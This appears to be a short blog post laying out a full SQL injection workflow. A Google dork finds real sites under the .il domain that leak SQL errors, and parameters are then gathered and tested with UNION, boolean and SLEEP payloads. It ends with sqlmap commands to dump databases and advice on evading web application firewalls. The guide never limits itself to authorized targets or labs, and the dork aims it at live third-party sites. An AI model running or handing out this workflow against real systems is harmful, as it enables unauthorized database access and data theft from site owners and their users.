Identifying and Exploiting SQL Injection Vulnerabilities

Ahmed Najeh
2 min readAug 14, 2024

--

### How to Search for SQL Injection Vulnerabilities (High-Scope Method)

1. **Using Google Dork:**
— Execute the following query on Google:
```
site:.il “You have an error in your SQL syntax”
```
— This search will help you find endpoints that clearly display SQL errors on their pages, suggesting they might be vulnerable to SQL Injection (SQLi) with a high probability.

2. **Record Vulnerable Endpoints:**
— Save these endpoints where SQL errors are displayed in your notes. This indicates potential SQLi vulnerabilities.

3. **Utilize the Wayback Machine:**
— Visit the Wayback Machine to find historical versions of the website. Use the following command:
```
waybackmachine https://test.il | grep “=”
```
— This will help you identify endpoints with parameters. Filter and remove duplicates, then save these in your notes as well.

4. **Manual Inspection:**
— Access the website and monitor the Network tab in Inspect Element.
— For example, on a login page, submit a request with any username and password. Capture this POST request and save it in your notes.
— Repeat this process for all GET and POST requests, and look for hidden parameters in the source code or by guessing.

5. **Collect and Analyze Requests:**
— Save all captured requests.
— After collecting them, sort and remove duplicates.

6. **Testing for SQL Injection:**
— **Direct Error-Based SQLi:**
— Test parameters by injecting SQL payloads such as `’, “`, ` — `, `;`, and `/*`.
— Example payload for testing:
```
1' UNION SELECT 1, table_name FROM information_schema.tables —
```
— If you receive any information, use SQLMap to extract more data.
— **Blind SQL Injection Based on Boolean:**
— Test the condition by altering parameter values:
```
AND 1=1 —
```
```
AND 1=2 —
```
— If the response changes, the site may be vulnerable.
— **Blind SQL Injection Based on Time:**
— Test with time-based payloads:
```
OR IF(1=1, SLEEP(5), 0) —
```
— If the site response is delayed by 5 seconds, it is likely vulnerable.

7. **Using SQLMap for Database Extraction:**
— For GET requests:
```
sqlmap -u https://test.il — dbs — threads=10
```
— For POST requests:
```
sqlmap -u https://test.il — data=”parametername=value” — dbs
```
— For authenticated requests:
```
sqlmap -u “https://test.il" — data=”parametername=value” — cookie=”value” — dbs
```
— For multipart requests (copy the full request into a file named `request.txt`):
```
sqlmap -r request.txt — dbs — threads=10
```

- Utilize various SQLMap options to bypass WAFs (Web Application Firewalls) and retry with stronger payloads and encoding.

— -

--

--

Ahmed Najeh
Ahmed Najeh

Written by Ahmed Najeh

ذو العَقلِ يَشقَى في النّعيمِ بعَقْلِهِ وَأخو الجَهالَةِ في الشّقاوَةِ يَنعَمُ https://hackerone.com/im4x https://web.facebook.com/im4xx/